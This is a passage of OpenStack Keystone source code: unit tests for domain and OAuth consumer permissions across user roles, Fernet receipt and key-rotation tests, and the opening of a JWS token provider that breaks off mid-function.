with self.test_client() as c:
c.post('/v3/OS-OAUTH1/consumers',
json={'consumer': {}},
headers=self.headers)
def test_user_can_update_consumer(self):
ref = PROVIDERS.oauth_api.create_consumer(
{'id': uuid.uuid4().hex})
with self.test_client() as c:
c.patch('/v3/OS-OAUTH1/consumers/%s' % ref['id'],
json={'consumer': {'description': uuid.uuid4().hex}},
headers=self.headers)
def test_user_can_delete_consumer(self):
ref = PROVIDERS.oauth_api.create_consumer(
{'id': uuid.uuid4().hex})
with self.test_client() as c:
c.delete('/v3/OS-OAUTH1/consumers/%s' % ref['id'],
headers=self.headers)
```
#### File: protection/v3/test_domains.py
```python
import uuid
import http.client
from oslo_serialization import jsonutils
from keystone.common.policies import domain as dp
from keystone.common import provider_api
import keystone.conf
from keystone.tests.common import auth as common_auth
from keystone.tests import unit
from keystone.tests.unit import base_classes
from keystone.tests.unit import ksfixtures
from keystone.tests.unit.ksfixtures import temporaryfile
CONF = keystone.conf.CONF
PROVIDERS = provider_api.ProviderAPIs
class _SystemUserDomainTests(object):
def test_user_can_list_domains(self):
domain = PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref()
)
with self.test_client() as c:
r = c.get('/v3/domains', headers=self.headers)
domain_ids = []
for domain in r.json['domains']:
domain_ids.append(domain['id'])
self.assertIn(domain['id'], domain_ids)
def test_user_can_filter_domains_by_name(self):
domain_name = uuid.uuid4().hex
domain = unit.new_domain_ref(name=domain_name)
domain = PROVIDERS.resource_api.create_domain(domain['id'], domain)
PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref()
)
with self.test_client() as c:
r = c.get(
'/v3/domains?name=%s' % domain_name,
headers=self.headers
)
self.assertEqual(1, len(r.json['domains']))
self.assertEqual(domain['id'], r.json['domains'][0]['id'])
def test_user_can_filter_domains_by_enabled(self):
enabled_domain = PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref()
)
disabled_domain = PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref(enabled=False)
)
with self.test_client() as c:
r = c.get('/v3/domains?enabled=true', headers=self.headers)
enabled_domain_ids = []
for domain in r.json['domains']:
enabled_domain_ids.append(domain['id'])
self.assertIn(enabled_domain['id'], enabled_domain_ids)
self.assertNotIn(disabled_domain['id'], enabled_domain_ids)
r = c.get('/v3/domains?enabled=false', headers=self.headers)
disabled_domain_ids = []
for domain in r.json['domains']:
disabled_domain_ids.append(domain['id'])
self.assertIn(disabled_domain['id'], disabled_domain_ids)
self.assertNotIn(enabled_domain['id'], disabled_domain_ids)
def test_user_can_get_a_domain(self):
domain = PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref()
)
with self.test_client() as c:
r = c.get('/v3/domains/%s' % domain['id'], headers=self.headers)
self.assertEqual(domain['id'], r.json['domain']['id'])
class _SystemMemberAndReaderDomainTests(object):
def test_user_cannot_create_a_domain(self):
create = {'domain': {'name': uuid.uuid4().hex}}
with self.test_client() as c:
c.post(
'/v3/domains', json=create, headers=self.headers,
expected_status_code=http.client.FORBIDDEN
)
def test_user_cannot_update_a_domain(self):
domain = PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref()
)
update = {'domain': {'description': uuid.uuid4().hex}}
with self.test_client() as c:
c.patch(
'/v3/domains/%s' % domain['id'], json=update,
headers=self.headers,
expected_status_code=http.client.FORBIDDEN
)
def test_user_cannot_delete_a_domain(self):
domain = PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref()
)
with self.test_client() as c:
c.delete(
'/v3/domains/%s' % domain['id'], headers=self.headers,
expected_status_code=http.client.FORBIDDEN
)
class _DomainAndProjectUserDomainTests(object):
def test_user_can_get_a_domain(self):
with self.test_client() as c:
r = c.get('/v3/domains/%s' % self.domain_id, headers=self.headers)
self.assertEqual(self.domain_id, r.json['domain']['id'])
def test_user_cannot_get_a_domain_they_are_not_authorized_to_access(self):
domain = PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref()
)
with self.test_client() as c:
c.get(
'/v3/domains/%s' % domain['id'], headers=self.headers,
expected_status_code=http.client.FORBIDDEN
)
def test_user_cannot_list_domains(self):
with self.test_client() as c:
c.get(
'/v3/domains', headers=self.headers,
expected_status_code=http.client.FORBIDDEN
)
def test_user_cannot_filter_domains_by_name(self):
domain_name = uuid.uuid4().hex
domain = unit.new_domain_ref(name=domain_name)
domain = PROVIDERS.resource_api.create_domain(domain['id'], domain)
PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref()
)
with self.test_client() as c:
c.get(
'/v3/domains?name=%s' % domain_name,
headers=self.headers,
expected_status_code=http.client.FORBIDDEN
)
def test_user_cannot_filter_domains_by_enabled(self):
with self.test_client() as c:
c.get(
'/v3/domains?enabled=true', headers=self.headers,
expected_status_code=http.client.FORBIDDEN
)
c.get(
'/v3/domains?enabled=false', headers=self.headers,
expected_status_code=http.client.FORBIDDEN
)
def test_user_cannot_update_a_domain(self):
domain = PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref()
)
update = {'domain': {'description': uuid.uuid4().hex}}
with self.test_client() as c:
c.patch(
'/v3/domains/%s' % domain['id'], json=update,
headers=self.headers,
expected_status_code=http.client.FORBIDDEN
)
def test_user_cannot_create_a_domain(self):
create = {'domain': {'name': uuid.uuid4().hex}}
with self.test_client() as c:
c.post(
'/v3/domains', json=create, headers=self.headers,
expected_status_code=http.client.FORBIDDEN
)
def test_user_cannot_delete_a_domain(self):
domain = PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref()
)
with self.test_client() as c:
update = {'domain': {'enabled': False}}
path = '/v3/domains/%s' % domain['id']
c.patch(
path, json=update, headers=self.headers,
expected_status_code=http.client.FORBIDDEN
)
c.delete(
path, headers=self.headers,
expected_status_code=http.client.FORBIDDEN
)
def test_user_cannot_get_non_existant_domain_forbidden(self):
with self.test_client() as c:
c.get(
'/v3/domains/%s' % uuid.uuid4().hex,
headers=self.headers,
expected_status_code=http.client.FORBIDDEN
)
class SystemReaderTests(base_classes.TestCaseWithBootstrap,
common_auth.AuthTestMixin,
_SystemUserDomainTests,
_SystemMemberAndReaderDomainTests):
def setUp(self):
super(SystemReaderTests, self).setUp()
self.loadapp()
self.useFixture(ksfixtures.Policy(self.config_fixture))
self.config_fixture.config(group='oslo_policy', enforce_scope=True)
system_reader = unit.new_user_ref(
domain_id=CONF.identity.default_domain_id
)
self.system_reader_id = PROVIDERS.identity_api.create_user(
system_reader
)['id']
PROVIDERS.assignment_api.create_system_grant_for_user(
self.system_reader_id, self.bootstrapper.reader_role_id
)
auth = self.build_authentication_request(
user_id=self.system_reader_id, password=<PASSWORD>['password'],
system=True
)
# Grab a token using the persona we're testing and prepare headers
# for requests we'll be making in the tests.
with self.test_client() as c:
r = c.post('/v3/auth/tokens', json=auth)
self.token_id = r.headers['X-Subject-Token']
self.headers = {'X-Auth-Token': self.token_id}
class SystemMemberTests(base_classes.TestCaseWithBootstrap,
common_auth.AuthTestMixin,
_SystemUserDomainTests,
_SystemMemberAndReaderDomainTests):
def setUp(self):
super(SystemMemberTests, self).setUp()
self.loadapp()
self.useFixture(ksfixtures.Policy(self.config_fixture))
self.config_fixture.config(group='oslo_policy', enforce_scope=True)
system_member = unit.new_user_ref(
domain_id=CONF.identity.default_domain_id
)
self.system_member_id = PROVIDERS.identity_api.create_user(
system_member
)['id']
PROVIDERS.assignment_api.create_system_grant_for_user(
self.system_member_id, self.bootstrapper.member_role_id
)
auth = self.build_authentication_request(
user_id=self.system_member_id, password=<PASSWORD>['password'],
system=True
)
# Grab a token using the persona we're testing and prepare headers
# for requests we'll be making in the tests.
with self.test_client() as c:
r = c.post('/v3/auth/tokens', json=auth)
self.token_id = r.headers['X-Subject-Token']
self.headers = {'X-Auth-Token': self.token_id}
class SystemAdminTests(base_classes.TestCaseWithBootstrap,
common_auth.AuthTestMixin,
_SystemUserDomainTests):
def setUp(self):
super(SystemAdminTests, self).setUp()
self.loadapp()
self.useFixture(ksfixtures.Policy(self.config_fixture))
self.config_fixture.config(group='oslo_policy', enforce_scope=True)
self.system_admin_id = self.bootstrapper.admin_user_id
auth = self.build_authentication_request(
user_id=self.system_admin_id,
password=<PASSWORD>,
system=True
)
# Grab a token using the persona we're testing and prepare headers
# for requests we'll be making in the tests.
with self.test_client() as c:
r = c.post('/v3/auth/tokens', json=auth)
self.token_id = r.headers['X-Subject-Token']
self.headers = {'X-Auth-Token': self.token_id}
def test_user_can_update_a_domain(self):
domain = PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref()
)
update = {'domain': {'description': uuid.uuid4().hex}}
with self.test_client() as c:
c.patch(
'/v3/domains/%s' % domain['id'], json=update,
headers=self.headers
)
def test_user_can_create_a_domain(self):
create = {'domain': {'name': uuid.uuid4().hex}}
with self.test_client() as c:
c.post(
'/v3/domains', json=create, headers=self.headers
)
def test_user_can_delete_a_domain(self):
domain = PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref()
)
with self.test_client() as c:
update = {'domain': {'enabled': False}}
path = '/v3/domains/%s' % domain['id']
c.patch(path, json=update, headers=self.headers)
c.delete(path, headers=self.headers)
class DomainUserTests(base_classes.TestCaseWithBootstrap,
common_auth.AuthTestMixin,
_DomainAndProjectUserDomainTests):
def setUp(self):
super(DomainUserTests, self).setUp()
self.loadapp()
self.useFixture(ksfixtures.Policy(self.config_fixture))
self.config_fixture.config(group='oslo_policy', enforce_scope=True)
domain = PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref()
)
self.domain_id = domain['id']
domain_user = unit.new_user_ref(domain_id=self.domain_id)
self.domain_user_id = PROVIDERS.identity_api.create_user(
domain_user
)['id']
PROVIDERS.assignment_api.create_grant(
self.bootstrapper.member_role_id, user_id=self.domain_user_id,
domain_id=self.domain_id
)
auth = self.build_authentication_request(
user_id=self.domain_user_id, password=domain_user['password'],
domain_id=self.domain_id
)
# Grab a token using the persona we're testing and prepare headers
# for requests we'll be making in the tests.
with self.test_client() as c:
r = c.post('/v3/auth/tokens', json=auth)
self.token_id = r.headers['X-Subject-Token']
self.headers = {'X-Auth-Token': self.token_id}
class ProjectReaderTests(base_classes.TestCaseWithBootstrap,
common_auth.AuthTestMixin,
_DomainAndProjectUserDomainTests):
def setUp(self):
super(ProjectReaderTests, self).setUp()
self.loadapp()
self.useFixture(ksfixtures.Policy(self.config_fixture))
self.config_fixture.config(group='oslo_policy', enforce_scope=True)
domain = PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref()
)
self.domain_id = domain['id']
project_reader = unit.new_user_ref(domain_id=self.domain_id)
project_reader_id = PROVIDERS.identity_api.create_user(
project_reader
)['id']
project = unit.new_project_ref(domain_id=self.domain_id)
project_id = PROVIDERS.resource_api.create_project(
project['id'], project
)['id']
PROVIDERS.assignment_api.create_grant(
self.bootstrapper.reader_role_id, user_id=project_reader_id,
project_id=project_id
)
auth = self.build_authentication_request(
user_id=project_reader_id,
password=<PASSWORD>['password'],
project_id=project_id
)
# Grab a token using the persona we're testing and prepare headers
# for requests we'll be making in the tests.
with self.test_client() as c:
r = c.post('/v3/auth/tokens', json=auth)
self.token_id = r.headers['X-Subject-Token']
self.headers = {'X-Auth-Token': self.token_id}
class ProjectMemberTests(base_classes.TestCaseWithBootstrap,
common_auth.AuthTestMixin,
_DomainAndProjectUserDomainTests):
def setUp(self):
super(ProjectMemberTests, self).setUp()
self.loadapp()
self.useFixture(ksfixtures.Policy(self.config_fixture))
self.config_fixture.config(group='oslo_policy', enforce_scope=True)
domain = PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref()
)
self.domain_id = domain['id']
project_member = unit.new_user_ref(domain_id=self.domain_id)
project_member_id = PROVIDERS.identity_api.create_user(
project_member
)['id']
project = unit.new_project_ref(domain_id=self.domain_id)
project_id = PROVIDERS.resource_api.create_project(
project['id'], project
)['id']
PROVIDERS.assignment_api.create_grant(
self.bootstrapper.member_role_id, user_id=project_member_id,
project_id=project_id
)
auth = self.build_authentication_request(
user_id=project_member_id,
password=project_member['password'],
project_id=project_id
)
# Grab a token using the persona we're testing and prepare headers
# for requests we'll be making in the tests.
with self.test_client() as c:
r = c.post('/v3/auth/tokens', json=auth)
self.token_id = r.headers['X-Subject-Token']
self.headers = {'X-Auth-Token': self.token_id}
class ProjectAdminTests(base_classes.TestCaseWithBootstrap,
common_auth.AuthTestMixin,
_DomainAndProjectUserDomainTests):
def setUp(self):
super(ProjectAdminTests, self).setUp()
self.loadapp()
self.policy_file = self.useFixture(temporaryfile.SecureTempFile())
self.policy_file_name = self.policy_file.file_name
self.useFixture(
ksfixtures.Policy(
self.config_fixture, policy_file=self.policy_file_name
)
)
self._override_policy()
self.config_fixture.config(group='oslo_policy', enforce_scope=True)
domain = PROVIDERS.resource_api.create_domain(
uuid.uuid4().hex, unit.new_domain_ref()
)
self.domain_id = domain['id']
project_admin = unit.new_user_ref(domain_id=self.domain_id)
project_admin_id = PROVIDERS.identity_api.create_user(
project_admin
)['id']
project = unit.new_project_ref(domain_id=self.domain_id)
project_id = PROVIDERS.resource_api.create_project(
project['id'], project
)['id']
PROVIDERS.assignment_api.create_grant(
self.bootstrapper.admin_role_id, user_id=project_admin_id,
project_id=project_id
)
auth = self.build_authentication_request(
user_id=project_admin_id,
password=<PASSWORD>['password'],
project_id=project_id
)
# Grab a token using the persona we're testing and prepare headers
# for requests we'll be making in the tests.
with self.test_client() as c:
r = c.post('/v3/auth/tokens', json=auth)
self.token_id = r.headers['X-Subject-Token']
self.headers = {'X-Auth-Token': self.token_id}
def _override_policy(self):
# TODO(lbragstad): Remove this once the deprecated policies in
# keystone.common.policies.domains have been removed. This is only
# here to make sure we test the new policies instead of the deprecated
# ones. Oslo.policy will OR deprecated policies with new policies to
# maintain compatibility and give operators a chance to update
# permissions or update policies without breaking users. This will
# cause these specific tests to fail since we're trying to correct this
# broken behavior with better scope checking.
with open(self.policy_file_name, 'w') as f:
overridden_policies = {
'identity:get_domain': (
dp.SYSTEM_USER_OR_DOMAIN_USER_OR_PROJECT_USER
)
}
f.write(jsonutils.dumps(overridden_policies))
```
#### File: unit/receipt/test_fernet_provider.py
```python
import base64
import datetime
import hashlib
import os
from unittest import mock
import uuid
from oslo_utils import timeutils
from keystone.common import fernet_utils
from keystone.common import provider_api
from keystone.common import utils
import keystone.conf
from keystone import exception
from keystone.identity.backends import resource_options as ro
from keystone.receipt.providers import fernet
from keystone.receipt import receipt_formatters
from keystone.tests import unit
from keystone.tests.unit import default_fixtures
from keystone.tests.unit import ksfixtures
from keystone.tests.unit.ksfixtures import database
from keystone.token import provider as token_provider
CONF = keystone.conf.CONF
PROVIDERS = provider_api.ProviderAPIs
class TestFernetReceiptProvider(unit.TestCase):
def setUp(self):
super(TestFernetReceiptProvider, self).setUp()
self.provider = fernet.Provider()
def test_invalid_receipt_raises_receipt_not_found(self):
receipt_id = uuid.uuid4().hex
e = self.assertRaises(
exception.ReceiptNotFound,
self.provider.validate_receipt,
receipt_id)
self.assertIn(receipt_id, u'%s' % e)
class TestValidate(unit.TestCase):
def setUp(self):
super(TestValidate, self).setUp()
self.useFixture(database.Database())
self.useFixture(
ksfixtures.ConfigAuthPlugins(
self.config_fixture,
['totp', 'token', 'password']))
self.load_backends()
PROVIDERS.resource_api.create_domain(
default_fixtures.ROOT_DOMAIN['id'], default_fixtures.ROOT_DOMAIN)
def config_overrides(self):
super(TestValidate, self).config_overrides()
self.config_fixture.config(group='receipt', provider='fernet')
def test_validate_v3_receipt_simple(self):
# Check the fields in the receipt result when use validate_v3_receipt
# with a simple receipt.
domain_ref = unit.new_domain_ref()
domain_ref = PROVIDERS.resource_api.create_domain(
domain_ref['id'], domain_ref
)
rule_list = [
['password', '<PASSWORD>'],
['password', '<PASSWORD>', 'token'],
]
user_ref = unit.new_user_ref(domain_ref['id'])
user_ref = PROVIDERS.identity_api.create_user(user_ref)
user_ref['options'][ro.MFA_RULES_OPT.option_name] = rule_list
user_ref['options'][ro.MFA_ENABLED_OPT.option_name] = True
PROVIDERS.identity_api.update_user(user_ref['id'], user_ref)
method_names = ['password']
receipt = PROVIDERS.receipt_provider_api.\
issue_receipt(user_ref['id'], method_names)
receipt = PROVIDERS.receipt_provider_api.validate_receipt(
receipt.id)
self.assertIsInstance(receipt.expires_at, str)
self.assertIsInstance(receipt.issued_at, str)
self.assertEqual(set(method_names), set(receipt.methods))
self.assertEqual(
set(frozenset(r) for r in rule_list),
set(frozenset(r) for r in
receipt.required_methods))
self.assertEqual(user_ref['id'], receipt.user_id)
def test_validate_v3_receipt_validation_error_exc(self):
# When the receipt format isn't recognized, ReceiptNotFound is raised.
# A uuid string isn't a valid Fernet receipt.
receipt_id = uuid.uuid4().hex
self.assertRaises(
exception.ReceiptNotFound,
PROVIDERS.receipt_provider_api.validate_receipt,
receipt_id
)
class TestReceiptFormatter(unit.TestCase):
def test_restore_padding(self):
# 'a' will result in '==' padding, 'aa' will result in '=' padding, and
# 'aaa' will result in no padding.
binary_to_test = [b'a', b'aa', b'aaa']
for binary in binary_to_test:
# base64.urlsafe_b64encode takes bytes and returns
# bytes.
encoded_string = base64.urlsafe_b64encode(binary)
encoded_string = encoded_string.decode('utf-8')
# encoded_string is now str.
encoded_str_without_padding = encoded_string.rstrip('=')
self.assertFalse(encoded_str_without_padding.endswith('='))
encoded_str_with_padding_restored = (
receipt_formatters.ReceiptFormatter.restore_padding(
encoded_str_without_padding)
)
self.assertEqual(encoded_string, encoded_str_with_padding_restored)
class TestPayloads(unit.TestCase):
def setUp(self):
super(TestPayloads, self).setUp()
self.useFixture(
ksfixtures.ConfigAuthPlugins(
self.config_fixture, ['totp', 'token', 'password']))
def assertTimestampsEqual(self, expected, actual):
# The timestamp that we get back when parsing the payload may not
# exactly match the timestamp that was put in the payload due to
# conversion to and from a float.
exp_time = timeutils.parse_isotime(expected)
actual_time = timeutils.parse_isotime(actual)
# the granularity of timestamp string is microseconds and it's only the
# last digit in the representation that's different, so use a delta
# just above nanoseconds.
return self.assertCloseEnoughForGovernmentWork(exp_time, actual_time,
delta=1e-05)
def test_strings_can_be_converted_to_bytes(self):
s = token_provider.random_urlsafe_str()
self.assertIsInstance(s, str)
b = receipt_formatters.ReceiptPayload.random_urlsafe_str_to_bytes(s)
self.assertIsInstance(b, bytes)
def test_uuid_hex_to_byte_conversions(self):
payload_cls = receipt_formatters.ReceiptPayload
expected_hex_uuid = uuid.uuid4().hex
uuid_obj = uuid.UUID(expected_hex_uuid)
expected_uuid_in_bytes = uuid_obj.bytes
actual_uuid_in_bytes = payload_cls.convert_uuid_hex_to_bytes(
expected_hex_uuid)
self.assertEqual(expected_uuid_in_bytes, actual_uuid_in_bytes)
actual_hex_uuid = payload_cls.convert_uuid_bytes_to_hex(
expected_uuid_in_bytes)
self.assertEqual(expected_hex_uuid, actual_hex_uuid)
def test_time_string_to_float_conversions(self):
payload_cls = receipt_formatters.ReceiptPayload
original_time_str = utils.isotime(subsecond=True)
time_obj = timeutils.parse_isotime(original_time_str)
expected_time_float = (
(timeutils.normalize_time(time_obj) -
datetime.datetime.utcfromtimestamp(0)).total_seconds())
# NOTE(lbragstad): The receipt expiration time for Fernet receipts is
# passed in the payload of the receipt. This is different from the
# receipt creation time, which is handled by Fernet and doesn't support
# subsecond precision because it is a timestamp integer.
self.assertIsInstance(expected_time_float, float)
actual_time_float = payload_cls._convert_time_string_to_float(
original_time_str)
self.assertIsInstance(actual_time_float, float)
self.assertEqual(expected_time_float, actual_time_float)
# Generate expected_time_str using the same time float. Using
# original_time_str from utils.isotime will occasionally fail due to
# floating point rounding differences.
time_object = datetime.datetime.utcfromtimestamp(actual_time_float)
expected_time_str = utils.isotime(time_object, subsecond=True)
actual_time_str = payload_cls._convert_float_to_time_string(
actual_time_float)
self.assertEqual(expected_time_str, actual_time_str)
def _test_payload(self, payload_class, exp_user_id=None, exp_methods=None):
exp_user_id = exp_user_id or uuid.uuid4().hex
exp_methods = exp_methods or ['password']
exp_expires_at = utils.isotime(timeutils.utcnow(), subsecond=True)
payload = payload_class.assemble(
exp_user_id, exp_methods, exp_expires_at)
(user_id, methods, expires_at) = payload_class.disassemble(payload)
self.assertEqual(exp_user_id, user_id)
self.assertEqual(exp_methods, methods)
self.assertTimestampsEqual(exp_expires_at, expires_at)
def test_payload(self):
self._test_payload(receipt_formatters.ReceiptPayload)
def test_payload_multiple_methods(self):
self._test_payload(
receipt_formatters.ReceiptPayload,
exp_methods=['password', 'totp'])
class TestFernetKeyRotation(unit.TestCase):
def setUp(self):
super(TestFernetKeyRotation, self).setUp()
# A collection of all previously-seen signatures of the key
# repository's contents.
self.key_repo_signatures = set()
@property
def keys(self):
"""Key files converted to numbers."""
return sorted(
int(x) for x in os.listdir(CONF.fernet_receipts.key_repository))
@property
def key_repository_size(self):
"""The number of keys in the key repository."""
return len(self.keys)
@property
def key_repository_signature(self):
"""Create a "thumbprint" of the current key repository.
Because key files are renamed, this produces a hash of the contents of
the key files, ignoring their filenames.
The resulting signature can be used, for example, to ensure that you
have a unique set of keys after you perform a key rotation (taking a
static set of keys, and simply shuffling them, would fail such a test).
"""
# Load the keys into a list, keys is list of str.
key_utils = fernet_utils.FernetUtils(
CONF.fernet_receipts.key_repository,
CONF.fernet_receipts.max_active_keys,
'fernet_receipts'
)
keys = key_utils.load_keys()
# Sort the list of keys by the keys themselves (they were previously
# sorted by filename).
keys.sort()
# Create the thumbprint using all keys in the repository.
signature = hashlib.sha1()
for key in keys:
# Need to convert key to bytes for update.
signature.update(key.encode('utf-8'))
return signature.hexdigest()
def assertRepositoryState(self, expected_size):
"""Validate the state of the key repository."""
self.assertEqual(expected_size, self.key_repository_size)
self.assertUniqueRepositoryState()
def assertUniqueRepositoryState(self):
"""Ensure that the current key repo state has not been seen before."""
# This is assigned to a variable because it takes some work to
# calculate.
signature = self.key_repository_signature
# Ensure the signature is not in the set of previously seen signatures.
self.assertNotIn(signature, self.key_repo_signatures)
# Add the signature to the set of repository signatures to validate
# that we don't see it again later.
self.key_repo_signatures.add(signature)
def test_rotation(self):
# Initializing a key repository results in this many keys. We don't
# support max_active_keys being set any lower.
min_active_keys = 2
# Simulate every rotation strategy up to "rotating once a week while
# maintaining a year's worth of keys."
for max_active_keys in range(min_active_keys, 52 + 1):
self.config_fixture.config(group='fernet_receipts',
max_active_keys=max_active_keys)
# Ensure that resetting the key repository always results in 2
# active keys.
self.useFixture(
ksfixtures.KeyRepository(
self.config_fixture,
'fernet_receipts',
CONF.fernet_receipts.max_active_keys
)
)
# Validate the initial repository state.
self.assertRepositoryState(expected_size=min_active_keys)
# The repository should be initialized with a staged key (0) and a
# primary key (1). The next key is just auto-incremented.
exp_keys = [0, 1]
next_key_number = exp_keys[-1] + 1 # keep track of next key
self.assertEqual(exp_keys, self.keys)
# Rotate the keys just enough times to fully populate the key
# repository.
key_utils = fernet_utils.FernetUtils(
CONF.fernet_receipts.key_repository,
CONF.fernet_receipts.max_active_keys,
'fernet_receipts'
)
for rotation in range(max_active_keys - min_active_keys):
key_utils.rotate_keys()
self.assertRepositoryState(expected_size=rotation + 3)
exp_keys.append(next_key_number)
next_key_number += 1
self.assertEqual(exp_keys, self.keys)
# We should have a fully populated key repository now.
self.assertEqual(max_active_keys, self.key_repository_size)
# Rotate an additional number of times to ensure that we maintain
# the desired number of active keys.
key_utils = fernet_utils.FernetUtils(
CONF.fernet_receipts.key_repository,
CONF.fernet_receipts.max_active_keys,
'fernet_receipts'
)
for rotation in range(10):
key_utils.rotate_keys()
self.assertRepositoryState(expected_size=max_active_keys)
exp_keys.pop(1)
exp_keys.append(next_key_number)
next_key_number += 1
self.assertEqual(exp_keys, self.keys)
def test_rotation_disk_write_fail(self):
# Make sure that the init key repository contains 2 keys
self.assertRepositoryState(expected_size=2)
key_utils = fernet_utils.FernetUtils(
CONF.fernet_receipts.key_repository,
CONF.fernet_receipts.max_active_keys,
'fernet_receipts'
)
# Simulate the disk full situation
mock_open = mock.mock_open()
file_handle = mock_open()
file_handle.flush.side_effect = IOError('disk full')
with mock.patch('keystone.common.fernet_utils.open', mock_open):
self.assertRaises(IOError, key_utils.rotate_keys)
# Assert that the key repository is unchanged
self.assertEqual(self.key_repository_size, 2)
with mock.patch('keystone.common.fernet_utils.open', mock_open):
self.assertRaises(IOError, key_utils.rotate_keys)
# Assert that the key repository is still unchanged, even after
# repeated rotation attempts.
self.assertEqual(self.key_repository_size, 2)
# Rotate the keys normally, without any mocking, to show that the
# system can recover.
key_utils.rotate_keys()
# Assert that the key repository is now expanded.
self.assertEqual(self.key_repository_size, 3)
def test_rotation_empty_file(self):
active_keys = 2
self.assertRepositoryState(expected_size=active_keys)
empty_file = os.path.join(CONF.fernet_receipts.key_repository, '2')
with open(empty_file, 'w'):
pass
key_utils = fernet_utils.FernetUtils(
CONF.fernet_receipts.key_repository,
CONF.fernet_receipts.max_active_keys,
'fernet_receipts'
)
# Rotate the keys to overwrite the empty file
key_utils.rotate_keys()
self.assertTrue(os.path.isfile(empty_file))
keys = key_utils.load_keys()
self.assertEqual(3, len(keys))
self.assertTrue(os.path.getsize(empty_file) > 0)
def test_non_numeric_files(self):
evil_file = os.path.join(CONF.fernet_receipts.key_repository, '99.bak')
with open(evil_file, 'w'):
pass
key_utils = fernet_utils.FernetUtils(
CONF.fernet_receipts.key_repository,
CONF.fernet_receipts.max_active_keys,
'fernet_receipts'
)
key_utils.rotate_keys()
self.assertTrue(os.path.isfile(evil_file))
keys = 0
for x in os.listdir(CONF.fernet_receipts.key_repository):
if x == '99.bak':
continue
keys += 1
self.assertEqual(3, keys)
class TestLoadKeys(unit.TestCase):
def assertValidFernetKeys(self, keys):
# Make sure each key is a non-empty string
for key in keys:
self.assertGreater(len(key), 0)
self.assertIsInstance(key, str)
def test_non_numeric_files(self):
evil_file = os.path.join(CONF.fernet_receipts.key_repository, '~1')
with open(evil_file, 'w'):
pass
key_utils = fernet_utils.FernetUtils(
CONF.fernet_receipts.key_repository,
CONF.fernet_receipts.max_active_keys,
'fernet_receipts'
)
keys = key_utils.load_keys()
self.assertEqual(2, len(keys))
self.assertValidFernetKeys(keys)
def test_empty_files(self):
empty_file = os.path.join(CONF.fernet_receipts.key_repository, '2')
with open(empty_file, 'w'):
pass
key_utils = fernet_utils.FernetUtils(
CONF.fernet_receipts.key_repository,
CONF.fernet_receipts.max_active_keys,
'fernet_receipts'
)
keys = key_utils.load_keys()
self.assertEqual(2, len(keys))
self.assertValidFernetKeys(keys)
```
#### File: providers/jws/core.py
```python
import datetime
import os
import jwt
from oslo_utils import timeutils
from keystone.common import utils
import keystone.conf
from keystone import exception
from keystone.i18n import _
from keystone.token.providers import base
CONF = keystone.conf.CONF
class Provider(base.Provider):
def __init__(self, *args, **kwargs):
super(Provider, self).__init__(*args, **kwargs)
# NOTE(lbragstad): We add these checks here because if the jws
# provider is going to be used and either the `key_repository` is empty
# or doesn't exist we should fail, hard. It doesn't make sense to start
# keystone and just 500 because we can't do anything with an empty or
# non-existant key repository.
private_key = os.path.join(
CONF.jwt_tokens.jws_private_key_repository, 'private.pem'
)
public_key_repo = CONF.jwt_tokens.jws_public_key_repository
if not os.path.exists(private_key):
subs = {'private_key': private_key}
raise SystemExit(_(
'%(private_key)s does not exist. You can generate a key pair '
'using `keystone-manage create_jws_keypair`.') % subs)
if not os.path.exists(public_key_repo):
subs = {'public_key_repo': public_key_repo}
raise SystemExit(_(
'%(public_key_repo)s does not exist. Please make sure the '
'directory exists and is readable by the process running '
'keystone.') % subs)
if len(os.listdir(public_key_repo)) == 0:
subs = {'public_key_repo': public_key_repo}
msg = _(
'%(public_key_repo)s must contain at least one public '
'key but it is empty. You can generate a key pair using '
'`keystone-manage create_jws_keypair`.'
)
raise SystemExit(msg % subs)
self.token_formatter = JWSFormatter()
def generate_id_and_issued_at(self, token):
return self.token_formatter.create_token(
token.user_id, token.expires_at, token.audit_ids, token.methods,
system=token.system, domain_id=token.domain_id,
project_id=token.project_id, trust_id=token.trust_id,
federated_group_ids=token.federated_groups,
identity_provider_id=token.identity_provider_id,
protocol_id=token.protocol_id,
access_token_id=token.access_token_id,
app_cred_id=token.application_credential_id
)
def validate_token(self, token_id):
return self.token_formatter.validate_token(token_id)
class JWSFormatter(object):
# NOTE(lbragstad): If in the future we expand support for different
# algorithms, make this configurable and validate it against a blessed list
# of supported algorithms.
algorithm = 'ES256'
@property
def private_key(self):
private_key_path = os.path.join(
CONF.jwt_tokens.jws_private_key_repository, 'private.pem'
)
with open(private_key_path, 'r') as f:
key = f.read()
return key
@property
def public_keys(self):
keys = []
key_repo = CONF.jwt_tokens.jws_public_key_repository
for keyfile in os.listdir(key_repo):
with open(os.path.join(key_repo, keyfile), 'r') as f:
keys.append(f.read())
return keys
def create_token(self, user_id, expires_at, audit_ids, methods,
system=None, domain_id=None, project_id=None,
trust_id=None, federated_group_ids=None,
identity_provider_id=None, protocol_id=None,
access_token_id=None, app_cred_id=None):
issued_at = utils.isotime(subsecond=True)
issued_at_int = self._convert_time_string_to_int(issued_at)
expires_at_int = self._convert_time_string_to_int(expires_at)
payload = {
# public claims
'sub': user_id,
'iat': issued_at_int,
'exp': expires_at_int,
# private claims
'openstack_methods': methods,
'openstack_audit_ids': audit_ids,
'openstack_system': system,
'openstack_domain_id': domain_id,
'openstack_project_id': project_id,
'openstack_trust_id': trust_id,
'openstack_group_ids': federated_group_ids,
'openstack_idp_id': identity_provider_id,
'openstack_protocol_id': protocol_id,
